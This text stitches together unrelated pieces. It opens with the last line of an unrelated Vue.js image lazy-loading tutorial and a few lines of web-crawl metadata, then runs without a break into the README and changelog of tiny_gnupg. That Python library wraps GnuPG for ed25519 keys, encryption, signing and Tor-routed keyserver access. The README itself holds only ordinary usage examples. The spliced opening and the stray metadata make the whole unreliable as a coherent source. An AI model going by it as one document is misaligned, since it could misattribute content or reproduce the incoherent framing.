I can’t think of a much easier way to handle image preloading. If you can, feel free to send us a message! For now though, I believe vue-clazy-load can handle pretty much any lazy-loading situation. Enjoy!
|
https://alligator.io/vuejs/vue-lazy-load-images/
|
CC-MAIN-2019-09
|
refinedweb
| 611
| 67.15
|
15.6. Finding a Boolean propositional formula from a truth
The logic module in SymPy lets us manipulate complex Boolean expressions, also known as propositional formulas.
This recipe will show an example where this module can be useful. Let's suppose that, in a program, we need to write a complex
if statement depending on three Boolean variables. We can think about each of the eight possible cases (true, true and false, and so on) and evaluate what the outcome should be. SymPy offers a function to generate a compact logic expression that satisfies our truth table.
How to do it...
1. Let's import SymPy:
from sympy import * init_printing()
2. Let's define a few symbols:
var('x y z')
3. We can define propositional formulas with symbols and a few operators:
P = x & (y | ~z) P
4. We can use
subs() to evaluate a formula on actual Boolean values:
P.subs({x: True, y: False, z: True})
5. Now, we want to find a propositional formula depending on x, y, and z, with the following truth table:
6. Let's write down all combinations that we want to evaluate to
True, and those for which the outcome does not matter:
minterms = [[1, 0, 1], [1, 0, 0], [0, 0, 0]] dontcare = [[1, 1, 1], [1, 1, 0]]
7. Now, we use the
SOPform() function to derive an adequate formula:
Q = SOPform(['x', 'y', 'z'], minterms, dontcare) Q
8. Let's test that this proposition works:
Q.subs({x: True, y: False, z: False}), Q.subs( {x: False, y: True, z: True})
How it works...
The
SOPform() function generates a full expression corresponding to a truth table and simplifies it using the Quine-McCluskey algorithm. It returns the smallest Sum of Products form (or disjunction of conjunctions). Similarly, the
POSform() function returns a Product of Sums.
The given truth table can occur in this case: suppose that we want to write a file if it doesn't already exist (
z), or if the user wants to force the writing (
x). In addition, the user can prevent the writing (
y). The expression evaluates to
True if the file is to be written. The resulting SOP formula works if we explicitly forbid
x and
y in the first place (forcing and preventing the writing at the same time is forbidden).
There's more...
Here are a few references:
- SymPy logic module documentation at
- The propositional formula on Wikipedia, at
- Sum of Products on Wikipedia, at
- The Quine–McCluskey algorithm on Wikipedia, at
- Logic lectures on Awesome Math, at
|
https://ipython-books.github.io/156-finding-a-boolean-propositional-formula-from-a-truth-table/
|
CC-MAIN-2019-09
|
refinedweb
| 427
| 63.29
|
here is my solution of
Find All Anagrams in a String, checking prime numbers' sum instead of checking if arrays are equal:
public class Solution { public List<Integer> findAnagrams(String s, String p) { if (s.length() < p.length()) return new ArrayList<>(); int[] letters = new int[]{ 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101 }; int standard = 0, cache = 0; for (char c : p.toCharArray()) standard += letters[c - 'a']; for (int i = 0; i < p.length() - 1; i++) cache += letters[s.charAt(i) - 'a']; ArrayList<Integer> result = new ArrayList<>(); for (int j = 0; j <= s.length() - p.length(); j++) { cache += letters[s.charAt(j + p.length() - 1) - 'a']; if (cache == standard) result.add(j); cache -= letters[s.charAt(j) - 'a']; } return result; } }
it got an AC(2018-11-01 14:04), but soon i realized it cannot pass this test:
"op"
"by"
i dont know how to add test cases either since prime numbers are too much, but just FYI. ;-P
@liupangzi Thanks, I have added the test case. However, please do note that it is easy for one to modify their hash functions / prime number combinations and still get Accepted. And it is impossible to add all kinds of test that will prevent all of them from getting Accepted.
Please see the following post for similar idea:
|
https://discuss.leetcode.com/topic/65793/discuss-some-test-cases-may-be-missing
|
CC-MAIN-2018-05
|
refinedweb
| 234
| 80.62
|
For my assignment I defined a MetaData class for the info from the class header, and clients call a getMetaData() method on the server to retrieve this info
You could create a new interface which extends DBMain and adds getMetaData(). That's what I did anyway.
public interface ExtendedDBAccess extends DBAccess {...} public class Data implements ExtendedDBAccess {...}
Hi Jim, Thank you very much. That's like a beautiful
Can U imagine clients that call the fields the same the are called in Oracle database?!
They take bookings only within 48 hours of the start of room occupancy.
"stupid developer"
Vlad: Andrew, have U implemented this logic (with 48h) also?
1) If we just forget about indexed search, where would you use the names of DB Columns : on the client, Data, or its extention and how? Can you give me a sample?
2) Do U beleive the indexed search is needed when the whole database is cashed?
3) What do you think specification means by saying we have to flexible search mechanism?
Working with constants works fine ... till the data format changes.
|
http://www.coderanch.com/t/183637/java-developer-SCJD/certification/NX-avoid-hard-coding
|
CC-MAIN-2014-42
|
refinedweb
| 180
| 67.04
|
I’ve been doing a lot of experimenting with concurrent operations in haskell and in particular playing with and thinking about the design of concurrent FIFO queues. These structures are difficult to make both efficient and correct, due to the effects of contention on the parts of the structure tasked with coordinating reads and writes from multiple threads.
These are my thoughts so far on FIFO semantics.
In the interesting paper
“How FIFO is your concurrent FIFO queue?”(PDF).
A Haas, et al. propose that an ideal FIFO queue has operations that are
instantaneous (think of each
write having an infinitely accurate timestamp,
and each
read taking the corresponding element in timestamp order). They then
measure the degree to which real queues of various designs deviate from this
platonic FIFO semantics in their message ordering, using a metric they call
“element-fairness”. They experimentally measure element-fairness of both
so-called “strict FIFO” as well as “relaxed FIFO” designs, in which elements
are read in more or less the order they were written (some providing guarantees
of degree of re-ordering, others not).
The first interesting observation they make is that no queue actually exhibits FIFO semantics by their metric; this is because of the realities of the way atomic memory operations like CAS may arbitrarily reorder a set of contentious writes.
The second interesting result is that the efficient-but-relaxed-FIFO queues which avoid contention by making fewer guarantees about message ordering often perform closer to ideal FIFO semantics (by their metric) than the “strict” but slower queues!
As an outsider, reading papers on FIFO queue designs I get the impression that what authors mean by “the usual FIFO semantics” is often ill-defined. Clearly they don’t mean the platonic zero-time semantics of the “How FIFO… ” paper, since they can’t be called FIFO by that measure.
I suspect what makes a queue “strict FIFO” (by the paper’s categorization) might simply be
If
write xreturns at time
T, then
xwill be read before the elements of any
writes that have not yet started by time
T.
The idea is difficult to express, but is essentially that FIFO semantics is
only observable by way of actions taken by a thread after returning from a
write (think: thread
A writes
x, then tells
B which writes
y, where
our program’s correctness depends on the queue returning
y after
x). Note
that since a queue starts empty this is also sufficient to ensure writes don’t
“jump ahead” of writes already in the queue.
Imagine an absurd queue whose
write never returns; there’s very little one
can say for certain about the “correct” FIFO ordering of writes in that case,
especially when designing a program with a preempting scheduler that’s meant to
be portable. Indeed the correctness criterion above is actually probably a lot
stricter than many programs require; e.g. when there is no coordination between
writers, an observably-FIFO queue need only ensure that no reader thread sees
two messages from the same writer thread out of order (I think).
The platonic zero-time FIFO ordering criterion used in the paper is quite different from this observable, correctness-preserving FIFO criterion; I can imagine it being useful for people designing “realtime” software.
Update 04/15/2014:
What I’m trying to describe here is called linearizability, and is indeed a well-understood and common way of thinking about the semantics of concurrent data structures; somehow I missed or misunderstood the concept!
At a certain level of abstraction, correct observable FIFO semantics shouldn’t be hard to make efficient; after all, the moments during which we have contention (and horrible performance) are also the moments during which we don’t care about (or have no way of observing) correct ordering. In other words (although we have to be careful of the details) a thread-coordination scheme that breaks down (w/r/t element-fairness) under contention isn’t necessarily a problem. Compare-and-swap does just that, unfortunately it breaks down in a way that is slower rather than faster.
This is the first real release
shapely-data, a haskell library
up here on hackage
for working with algebraic datatypes in a simple generic form made up of
haskell’s primitive product, sum and unit types:
(,),
Either, and
().
You can install it with
cabal install shapely-data
In order from most to least important to me, here are the concerns that motivated the library:
Provide a good story for
(,)/
Either as a lingua franca generic
representation that other library writers can use without dependencies,
encouraging abstractions in terms of products and sums (motivated
specifically by my work on
simple-actors.
Support algebraic operations on ADTs, making types composable
-- multiplication: let a = (X,(X,(X,()))) b = Left (Y,(Y,())) :: Either (Y,(Y,())) (Z,()) ab = a >*< b in ab == ( Left (X,(X,(X,(Y,(Y,()))))) :: Either (X,(X,(X,(Y,(Y,()))))) (X,(X,(X,(Z,())))) ) -- exponents, etc: fanout (head,(tail,(Prelude.length,()))) [1..3] == (1,([2,3],(3,()))) (unfanin (_4 `ary` (shiftl . Sh.reverse)) 1 2 3 4) == (3,(2,(1,(4,()))))
Support powerful, typed conversions between
Shapely types
data F1 = F1 (Maybe F1) (Maybe [Int]) deriving Eq data F2 = F2 (Maybe F2) (Maybe [Int]) deriving Eq f2 :: F2 f2 = coerce (F1 Nothing $ Just [1..3]) data Tsil a = Snoc (Tsil a) a | Lin deriving Eq truth = massage "123" == Snoc (Snoc (Snoc Lin '3') '2') '1'
Lowest on the list is supporting abstracting over different recursion schemes or supporting generic traversals and folds, though some basic support is planned.
Finally, in at least some cases this can completely replace
GHC.Generics and
may be a bit simpler. See
examples/Generics.hs for an example of the
GHC.Generics wiki example
ported to
shapely-data. And for a nice view on the changes that were
required, do:
git show 3a65e95 | perl /usr/share/doc/git/contrib/diff-highlight/diff-highlight
The
GHC.Generics representation has a lot of metadata and a complex
structure that can be useful in deriving default instances; more important to
us is to have a simple, canonical representation such that two types that
differ only in constructor names can be expected to have identical generic
representations.
This supports APIs that are type-agnostic (e.g. a database library that returns
a generic
Product, convertible later with
to), and allows us to define
algebraic operations and composition & conversion functions.
In this post Philip Nilsson describes an inspiring, principled approach to solving a toy problem posed in a programming interview. I wanted to implement a solution to a variant of the problem where we’d like to process a stream. It was pretty easy to sketch a solution out on paper but Philip’s solution was invaluable in testing and debugging my implementation. (See also Chris Done’s mind-melting loeb approach)
My goal was to have a function:
waterStream :: [Int] -> [Int]
that would take a possibly-infinite list of columns and return a stream of known water quantities, where volumes of water were output as soon as possible. We can get a solution to the original problem, then, with
ourWaterFlow = sum . waterStream
Here is the solution I came up with, with inline explanation:
{-# LANGUAGE BangPatterns #-} -- start processing `str` initializing the highest column to the left at 0, and -- an empty stack. waterStream :: [Int] -> [Int] waterStream str = processWithMax 0 str [] processWithMax :: Int -> [Int] -> [(Int,Int)] -> [Int] processWithMax prevMax = process where process [] = const [] -- output the quantity of water we know we can get, given the column at the -- head of the stream, `y`: process (y:ys) = eat 1 where eat !n xxs@((offset,x):xs) -- done with `y`, push it and its offset onto the stack | y < x = process ys ((n,y):xxs) -- at each "rise" we can output some known quantity of water; -- storing the "offset" as we did above lets us calculate water -- above a previously filled "valley" | otherwise = let col = offset*(min y prevMax - x) cols = eat (n+offset) xs -- filter out zeros: in if col == 0 then cols else col : cols -- if we got to the end of the stack, then `y` is the new highest -- column we've seen. eat !n [] = processWithMax y ys [(n,y)]
The bit about “offsets” is the tricky part which I don’t know how to explain without a pretty animation.
It took me much longer than I was expecting to code up the solution above that
worked on a few hand-drawn test cases, and at that point I didn’t have high
confidence that the code was correct, so I turned to
quickcheck and
assert.
First I wanted to make sure the invariant that the “column” values in the stack were strictly increasing held:
import Control.Exception (assert) ... --process (y:ys) = eat 1 process (y:ys) stack = assert (stackSane stack) $ eat 1 stack ...
Then I used Philip’s solution (which I had confidence in):
waterFlow :: [Int] -> Int waterFlow h = sum $ zipWith (-) (zipWith min (scanl1 max h) (scanr1 max h)) h
to test my implementation:
*Waterflow> import Test.QuickCheck *Waterflow Test.QuickCheck> quickCheck (\l -> waterFlow l == ourWaterFlow l) *** Failed! Falsifiable (after 21 tests and 28 shrinks): [1,0,0,0,1]
Oops! It turned out I had a bug in this line (fixed above):
--old buggy: --cols = eat (n+1) xs --new fixed: cols = eat (n+offset) xs
The solution seems to perform pretty well, processing 1,000,000
Ints in 30ms
on my machine:
import Criterion.Main main = do gen <- create rs <- replicateM 1000000 $ uniformR (0,100) gen defaultMain [ bench "ourWaterFlow" $ whnf ourWaterFlow rs
I didn’t get a good look at space usage over time, as I was testing with
mwc-random which doesn’t seem to support creating a lazy infinite list of
randoms and didn’t want to hunt down another library. Obviously on a stream
that simply descends forever, our stack of
(Int,Int) will grow to infinite
size.
It seems as though there is a decent amount of parallelism that could be exploited in this problem, but I didn’t have any luck on a quick attempt.
Have a parallel solution, or something just faster? Or an implementation that doesn’t need a big stack of previous values?
Type
That should give you an intuition. At this point you might want to stop and read through the following documentation, or continue reading below before coming back to these links for a more refined understanding and additional details:.
TypeFamiliesprovides the syntax
a ~ bto indicate type equality constraints; this is especially useful with type synonym functions, but can be useful on its own as well.
Maybe
After pouring 1.5 bottles of horrid caustic chemicals down the drain to no avail, I found I was able to clear a tough clogged shower drain with just the empty bottle:
Don’t get boiling water in your eyes.
Disclaimer: un-researched, under-educated, fast and loose hacking follows.
The other day I was thinking about counting in binary and how bits cascade when incrementing a counter.
000 001 010 011 100
I wondered: what if each bit flip was very “expensive”, for the hardware say? Are there other methods we could use that woud result in a “cheaper” increment operation, by avoiding those costly carries?
First, here’s a little bit of boring code that we’ll use below to print a list of Ints as padded binary, and some requisite imports:
import Data.Bits import Data.Word import Numeric import Text.Printf import Data.Char prettyPrintBits :: (Integral i, Show i)=> [i] -> IO () prettyPrintBits = mapM_ putStrLn . prettyListBits prettyListBits :: (Integral i, Show i)=> [i] -> [String] prettyListBits l = map (printPadded . toBin) l where toBin i = showIntAtBase 2 intToDigit i "" printPadded = printf ("%0"++width++"s") width = show $ ceiling $ logBase 2 $ (+1) $ fromIntegral $ maximum l
Anyway I started playing with this by hand, with a 3-bit example, and drawing funny pictures like these:
On the left is a table with the cost, in bit-flips, to increment a binary counter to that number, from the previous.
Then (in the middle of the pic above) I drew an undirected graph with edges connecting the numbers that differed by only a single bit (lots of symmetry there, no?); so what we’d like to do is walk that graph without repeating, to cycle through all the 3-bit combinations as “efficiently” as possible.
After doodling for a second I found a nice symmetrical path through the graph, and wrote the numbers we pass through in sequence (on the right side of the pic above).
Okay, but can we write a program to generate that sequence? And generalize it?
After I marked the bit-flip locations in the “bit-economical” binary sequence, I noticed the pattern from top to bottom is the same as what we’d use to build a binary tree from an ordered list, numbered from the bottom up.
Furthermore glancing back to my original table of “increment costs” I noticed they follow the same pattern; it turns out we can use a few simple bitwise operations on a normal binary count to enumerate all n-bit numbers with optimally-efficient bit flips. The algorithm is:
XOR) of adjacent numbers
1s in the result (
POPCNT)
Here’s an implementation in haskell that represents an infinite (sort of) efficient bit count:
lazyBits :: [Word] lazyBits = scanl complementBit 0 bitsToFlip where ns = [0..] :: [Word] bitsToFlip = zipWith (\x-> subtract 1 . popCount . xor x) ns $ tail ns
We can play with this & pretty-print the result:
*Main Text.Printf> take (2^3) $ lazyBits [0,1,3,2,6,7,5,4] *Main Text.Printf> prettyPrintBits $ take (2^3) $ lazyBits 000 001 011 010 110 111 101 100
This is similar to de Bruijn sequences and I’m sure this sort of sequence has some interesting applications. For instance just as with de Bruijn sequences I could see this being useful in cracking an imaginary lock consisting of toggling push-button digits.
But most real locks like that have buttons that lock in place and have a single
“reset” button. To model those we could do something similar to what we just
did, only we’d want to study a directed graph where we only ever have edges
resulting from flipping a
0 to a
1, and all numbers have an edge back to
0.
We’ve gotten side-tracked a bit. We started wanting to find a more efficient binary number system for incrementing, but is that what we got?
Well, no. In particular we have no algorithm for incrementing an arbitrary
number in our sequence. For instance, given only the number
010 we have
no way (that I’ve been able to figure out) of knowing that the left-most bit
should be flipped. In other words we need some amount of state to determine
the next bit to be flipped. At least that’s my assumtion.
One thing we do have is a method for comparing numbers in the sequence, something that’s pretty much essential if you want to do anything with a counter.
Here is some code to do just that, defined here in terms of bit strings (as
output by
prettyListBits); I haven’t figure out a clever set of bitwise ops
to do this, and have a somewhat foggy idea of why this works:
compareNums :: String -> String -> Ordering compareNums [] [] = EQ compareNums ('0':as) ('0':bs) = compareNums as bs compareNums ('1':as) ('1':bs) = invert $ compareNums as bs where invert EQ = EQ invert GT = LT invert LT = GT compareNums (a:_) (b:_) = compare a b compareNums _ _ = error "this assumes 0-padded, aligned numbers"
So how much does it really cost on average to increment an arbitrary number in the usual binary number system? We know it’s more than one, but we need a function from bit length to average cost.
To do that efficiently we’ll once again use the pattern we discovered above when we sketched out a 3-bit example. Looking at the way the different costs break down we have:
4 operations at cost 1 2 operations at cost 2 1 operation at cost 3
…out of a total of
8 - 1 increment operations, so the average cost is:
(4*1 + 2*2 + 1*3) / (8 - 1) = 1.5714
So a general function for
b bits would look like:
amortizedIncrCost :: Integer -> Double amortizedIncrCost b = avgd $ sum $ zipWith (*) (iterate (2*) 1) [b,b-1 ..1] where avgd n = (fromIntegral n) / (2^b - 1)
We’d like to know how this behaves as our number of bits
b approaches
infinity. We could take the limit of the function, but who knows how to do
that, so let’s just experiment:
*Main> amortizedIncrCost 3 1.5714285714285714 *Main> amortizedIncrCost 4 1.7333333333333334 *Main> amortizedIncrCost 8 1.968627450980392 *Main> amortizedIncrCost 16 1.9997558556496529 *Main> amortizedIncrCost 32 1.9999999925494194 *Main> amortizedIncrCost 64 2.0
Seems quite clearly to approach 2 as we exceed the accuracy of our
Double,
i.e. the average cost to increment an arbitrary-size binary counter is
two bit flips. Interesting!
Remember above how we mentioned our counting system required some additional state to determine the next bit to flip? Well a single bit is the smallest unit of state we know about; therefore even if we could figure out how to determine bit-flips with a single bit of state, or could derive a way of calculating the offset from the number itself, we’d still never be able to do better than two bit-flips per increment.
This is probably all pretty obvious information theory stuff, but was a fun little diversion.
|
http://brandon.si/
|
CC-MAIN-2014-35
|
refinedweb
| 2,943
| 55.47
|
tiny_gnupg - A small-as-possible solution for handling GnuPG ed25519 ECC keys.
Project description
tiny_gnupg - A small-as-possible solution for handling GnuPG ed25519 ECC keys.
A linux specific, small, simple & intuitive wrapper for creating, using and managing GnuPG’s Ed25519 curve keys. In our design, we favor reducing code size & complexity with strong, bias defaults over flexibility in the api. Our goal is to turn the powerful, complex, legacy gnupg system into a fun and safe tool to develop with.
This project is currently in unstable beta. It works like a charm, but there’s likely, and often bugs floating around, and the api is subject to change. Contributions are welcome.
Table Of Contents
Install
sudo apt-get install tor torsocks gnupg2 gpg-agent pip install --user --upgrade tiny_gnupg
Basic Commands
The GnuPG class’s instances are the primary interface for running commands & managing keys using the gpg2 executable.
from tiny_gnupg import GnuPG, run PATH_TO_GPG_BINARY = "/usr/bin/gpg2" gpg = GnuPG( email_address="bob@user.net", passphrase="bobs's passphrase", executable=PATH_TO_GPG_BINARY, ) # This will generate a primary ed25519 ECC certifying key, and three # subkeys, one each for the authentication, encryption, and signing # functionalities. gpg.generate_key() # Now this fingerprint can be used with arbitrary gpg2 commands. gpg.fingerprint # But the key is stored in the package's local keyring. To # talk to the package's gpg environment, an arbitrary command # can be constructed like this -> options = ["--armor", "--encrypt", "-r", gpg.fingerprint] command = gpg.encode_command(*options) inputs = gpg.encode_inputs("Message to myself") encrypted_message = gpg.read_output(command, inputs) # If a command would invoke the need for a passphrase, the # with_passphrase kwarg should be set to True -> command = gpg.encode_command(*options, with_passphrase=True) # The passphrase then needs to be the first arg passed to # encode_inputs -> inputs = gpg.encode_inputs(gpg.user.passphrase, *other_inputs) # The list of keys in the package's environment can be accessed # from the list_keys() method, which returns a dict -> gpg.list_keys() >>> {fingerprint: email_address, ...} # Or retrieve a specific key where a searchable portion of its uid # information is known, like an email address or fingerprint -> gpg.list_keys("bob@user.net") >>> {"EE36F0584971280730D76CEC94A470B77ABA6E81": "bob@user.net"} # Let's try encrypting a message to Alice, whose public key is # stored on keys.openpgp.org/ # First, we'll import Alice's key from the keyserver (This requires # a Tor system installation. Or an open TorBrowser, and the tor_port # attribute set to 9150) -> # Optional: gpg.keyserver.network.tor_port = 9150 run(gpg.network_import(uid="alice@email.domain")) # Then encrypt a message with Alice's key and sign it -> msg = "So, what's the plan this Sunday, Alice?" encrypted_message = gpg.encrypt( message=msg, uid="alice@email.domain", sign=True ) # The process of encrypting a message to a peer whose public key # might not be in the local package keyring is conveniently available # in a single method. It automatically searches for the recipient's # key on the keyserver so it can be used to encrypt the message -> run(gpg.auto_encrypt(msg, "alice@email.domain")) # Signing is automatic # We could directly send a copy of our key to Alice, or upload it to # the keyserver. Alice will need a copy so the signature on the # message can be verified. So let's upload it to the keyserver -> run(gpg.network_export(uid="bob@user.net")) # Alice could now import our key (after we do an email verification # with the keyserver) -> run(gpg.network_import("bob@user.net")) # Then Alice can simply receive the encrypted message and decrypt it -> decrypted_msg = gpg.decrypt(encrypted_message) # The process of decrypting a encrypted & signed message from a peer # whose public key might not be in the local package keyring is # conveniently available in a single method. It automatically determines # the signing key fingerprint, and searches for it on the keyserver # to verify the signature -> decrypted_msg = run(gpg.auto_decrypt(encrypted_message))
On most systems, because of a bug in GnuPG, email verification of uploaded keys will be necessary for others to import them from the keyserver. That’s because GnuPG will throw an error immediately upon trying to import keys with their uid information stripped off.
The package no longer comes with its own gpg2 binary. Your system gpg2 executable is probably located at: /usr/bin/gpg2. You could also type: whereis gpg2 to find it. If it’s not installed, you’ll have to install it with your system’s equivalent of: sudo apt-get install gnupg2
Networking Examples
# Since we use SOCKSv5 over Tor for all of our networking, as well # as the user-friendly aiohttp + aiohttp_socks libraries, the Tor # networking interface is also available to users. These utilities # allow arbitrary POST and GET requests to clearnet, or onionland, # websites -> from tiny_gnupg import GnuPG, Network, run client = Network(tor_port=9050) async def read_url(client, url): """ Use the instance's interface to read the page located at the url with a wrapper around an `aiohttp.ClientSession` context manager. """ async with client.context_get(url) as response: return await response.text() # Now we can read webpages with GET requests -> page_html = run(read_url(client, "")) # Let's try onionland -> url = "" onion_page_html = run(read_url(client, url)) # Check your ip address for fun -> ip_addr = run(read_url(client, "")) # There's a convenience function built into the class that # basically mimics read_url() -> ip_addr = run(client.get("")) # POST requests can also be sent with the context_post() method. # Let's use a POST request to send the keyserver a new key we # create -> async def post_data(client, url, payload=""): """ Use the instance's interface to post the api payload to the keyserver with a wrapper around an `aiohttp.ClientSession` context manager. """ async with client.context_post(url, json=payload) as response: return await response.text() gpg = GnuPG(email_address="bob@user.net", passphrase="bobs's passphrase") gpg.generate_key() url = gpg.keyserver._key_export_api_url payload = {"keytext": gpg.text_export(uid=gpg.fingerprint)} api_token_json = run(post_data(client, url, payload)) # There's also a convenience function built into the class that # mimics post_data() -> api_token_json = run(client.post(url, json=payload)) # Of course, this is just for demonstration. The method that should # be used for uploading a key to the keyserver is network_export -> run(gpg.network_export(gpg.fingerprint)) # And there we have it, it's super simple. And these requests have # the added benefit of being completely routed through Tor. The # keyserver here also has a v3 onion address which we use to query, # upload, and import keys. This provides a nice, default layer of # privacy to our communication needs.
These networking tools work off instances of aiohttp.ClientSession. To learn more about how to use their POST and GET requests, you can read the docs here.
About Torification
A user can make sure that any connections the gnupg binary makes with the network are always run through Tor by setting torify=True during initialization.
from tiny_gnupg import GnuPG gpg = GnuPG(**user_details, torify=True)
This is helpful because there are gnupg settings which cause certain commands to do automatic connections to the web. For instance, when encrypting, gnupg may be set to automatically search for the recipient’s key on a keyserver if it’s not in the local keyring. This doesn’t normally effect tiny_gnupg because it doesn’t use gnupg’s networking interface. It ensures Tor connections through the aiohttp_socks library. But, if gnupg does make these kinds of connections silently, using torify can prevent a user’s IP address from being inadvertently revealed.
Using torify requires a Tor installation on the user system. If the user is running Debian / Ubuntu, then this guide could be helpful.
More Commands
# An instance can also be constructed from lower-level objects -> from tiny_gnupg import BaseGnuPG, User, GnuPGConfig, run PATH_TO_GPG_BINARY = "/usr/bin/gpg2" # Passphrases can contain any characters, even emojis -> user = User(email_address="bob@user.net", passphrase="✅🐎🔋📌") config = GnuPGConfig(executable=PATH_TO_GPG_BINARY, torify=True) gpg = BaseGnuPG(user, config=config) # It turns out that the encrypt() method automatically signs the # message being encrypted. So, the `sign=False` flag only has to be # passed when a user doesn't want to sign a message -> encrypted_unsigned_message = gpg.encrypt( message="sending message as an unidentified sender", uid="alice@email.domain", # sending to alice, sign=False, # no sender identification ) # It also turns out, a user can sign things independently from # encrypting -> message_to_verify = "maybe a hash of a file?" signed_data = gpg.sign(target=message_to_verify) assert message_to_verify == gpg.decrypt(signed_data) # And verify a signature without checking the signed value -> gpg.verify(message=signed_data) # throws if invalid # Or sign a key in the package's keyring -> gpg.sign("alice@email.domain", key=True) # Importing key files is also a thing -> path_to_file = "/home/user/keyfiles/" gpg.file_import(path=path_to_file + "alices_key.asc") # As well as exporting public keys -> gpg.file_export(path=path_to_file, uid=gpg.user.email_address) # And secret keys, but really, keep those safe! -> gpg.file_export( path=path_to_file, uid=gpg.user.email_address, secret=True ) # The keys don't have to be exported to a file. Instead they can # be exported as strings -> my_key = gpg.text_export(uid=gpg.fingerprint) # So can secret keys (Be careful!) -> my_secret_key = gpg.text_export(gpg.fingerprint, secret=True) # And they can just as easily be imported from strings -> gpg.text_import(key=my_key)
Retiring Keys
After a user no longer considers a key useful, or wants to dissociate from the key, then they have some options:
from tiny_gnupg import GnuPG, run PATH_TO_GPG_BINARY = "/usr/bin/gpg2" gpg = GnuPG( email_address="bob@user.net", passphrase="bobs's passphrase", executable=PATH_TO_GPG_BINARY, ) # They can revoke their key then distribute it publicly (somehow) # (the keyserver can't currently handle key revocations) -> revoked_key = gpg.revoke(gpg.fingerprint) # <-- Distribute this! # Uploading the revoked key will only strip the user ID information # from the key on the keyserver. It won't explicitly let others know # the key has been retired. However, this action cannot be undone -> run(gpg.network_export(gpg.fingerprint)) # The key can also be deleted from the package keyring like this -> gpg.delete(uid="bob@user.net")
Known Issues
- Because of Debian bug #930665, & related GnuPG bug #T4393, importing keys from the default keyserver keys.openpgp.org doesn’t work automatically on all systems. Not without email confirmation, at least. That’s because the keyserver will not publish uid information attached to a key before a user confirms access to the email address assigned to the uploaded key. And, because GnuPG folks are still holding up the merging, & back-porting, of patches that would allow GnuPG to automatically handle keys without uids gracefully. This effects the network_import() method specifically, but also the text_import() & file_import() methods, if they happen to be passed a key or filename argument which refers to a key without uid information. The gpg2 binary in this package can be replaced manually if a user’s system has access to a patched version.
- Because of GnuPG bug #T3065, & related bug #1788190, the --keyserver & --keyserver-options http-proxy options won’t work with onion addresses, & they cause a crash if a keyserver lookup is attempted. This is not entirely an issue for us since we don’t use gnupg’s networking interface. In fact, we set these environment variables anyway to crash on purpose if gnupg tries to make a network connection. And in case the bug ever gets fixed (it won’t), or by accident the options do work in the future, then a tor SOCKSv5 connection will be used instead of a raw connection.
- This program may only be reliably compatible with keys that are also created with this program. That’s because our terminal parsing is reliant on specific metadata to be similar across all encountered keys. It seems most keys have successfully been parsed with recent updates, though more testing is needed.
- The tests don’t currently work when a tester’s system has a system installation of tiny_gnupg, & the tests are being run from a local git repo directory. That’s because the tests import tiny_gnupg, but if the program is installed in the system, then python will get confused about which keyring to use during the tests. This will lead to crashes & failed tests. Git clone testers probably have to run the test script closer to their system installation, one directory up & into a tests folder. Or pip uninstall tiny_gnupg. OR, send a pull request with an import fix.
- Currently, the package is part synchronous, & part asynchronous. This is not ideal, so a decision has to be made: either to stay mixed style, or choose one consistent style.
- We’re still in unstable beta & have to build out our test suite. Contributions welcome.
- The tests seems to fail on some systems because of a torsocks filter [1][2] which blocks some syscalls. This may be patched or not applicable on non-linux operating systems.
Changelog
Changes for version 0.9.0
Major Changes
- The passphrase keyword argument is now processed through the hashlib.scrypt function before being stored within a User instance & used within the GnuPG & BaseGnuPG classes. The GnuPG & BaseGnuPG classes also accept an optional salt keyword-only argument. These changes secure user keys & passwords by default with a memory-hard key derivation function & the uniqueness of the user-specified random salt. These changes provide better security & aren’t backwards compatible.
- The email keyword argument to the User, BaseGnuPG & GnuPG classes was changed to email_address. The attributes in the User class have also mirrored this change. As well, the key_email method on the GnuPG & BaseGnuPG classes is now key_email_address.
- The User class now does type & value checking on the username, email_address & passphrase strings passed into the __init__, as well as whenever their associated property attributes are set.
Minor Changes
- Documentation improvements.
- Various refactorings & code cleanups.
- More type hinting was added & improved upon.
- Removed the improper usage of the NoneType for type hinting.
- New constants were added to the tiny_gnupg.py module to specify problematic control & whitespace characters that shouldn’t be used in various user-defined inputs & credentials.
- The file_export methods of the GnuPG & BaseGnuPG classes now saves key files with either "public-key_" or "secret-key_" strings prepended to them to better specify for users the context of files saved to their filesystems.
- Removed the svg image file which didn’t accurately report the line coverage with the new changes to the package.
Changes for version 0.8.2
Minor Changes
- Documentation improvements.
- The username keyword-only argument to the User & GnuPG classes was given a default empty string. This change allows the username to be optional & ignorable by the user. When generating a key with an instance which doesn’t have a username specified, then the associated key will also not contain a username field.
Changes for version 0.8.1
Minor Changes
- Documentation improvements & typo fixes.
Changes for version 0.8.0
Major Changes
- The new GnuPGConfig & Keyserver classes were extracted from the GnuPG class. GnuPGConfig holds onto each instance’s path strings to the system resources (like the gpg2 binary, the .conf file, & the home directory), as well as other static constants & instance specific settings (like the torify boolean flag). And, the Keyserver class separates the Tor networking & key upload, download, & searching logic.
- The GnuPG class was given a super class, BaseGnuPG, which is initialized using User & GnuPGConfig objects instead of the strings & booleans which have until now been used to initialize a GnuPG instance. This allows users to choose between initializing instances using the package’s higher-level types or python built-in types.
- The gen_key method of GnuPG & BaseGnuPG was changed to generate_key.
Minor Changes
- Docstring, documentation & type annotation fixes.
- Improved the clarity of error messages & the UX of error handling.
- Improved various GnuPG terminal output parsing logics.
- Heavy factorings to improve clarity & better organize the codebase.
Changes for version 0.7.9
Minor Changes
- Docstring & type annotation fixes.
- Small internal refactorings.
Changes for version 0.7.8
Major Changes
- Security Alert: Users’ separate GnuPG instance’s with the same home directory, which represent distinct & different secret keys, can only be considered to represent separate identities during runtime if the passphrase for each instance is distinct & different. Past updates of the package have mentioned separate identities as if one instance won’t be able to access another’s secret keys, and this is not true unless their passphrases are different. This is how GnuPG itself is designed, where all public & secret keys are stored together in the home directory, & an identity is more strongly considered to be the current operating system’s user. A more effective way a user can separate identities is by setting a unique home directory for each identity. However, the GnuPG program wasn’t designed safely as it regards anonymity, so gaining confidence in its ability to respect more nuanced identity boundaries is dubious at best.
- The values that are inserted into raised exceptions were renamed to be declarative of exactly what has been inserted. I.e., instead of calling all the inserted exception object attributes something as generic as value, they are now inputs, uid, output, etc. This helps improve readability & clarity.
Minor Changes
- Various documentation improvements & fixes.
- Various code cleanups & refactorings.
- Added type hints to many of the codebase’s parameters.
Changes for version 0.7.7
Minor Changes
- Some documentation improvements & refactorings.
Changes for version 0.7.6
Major Changes
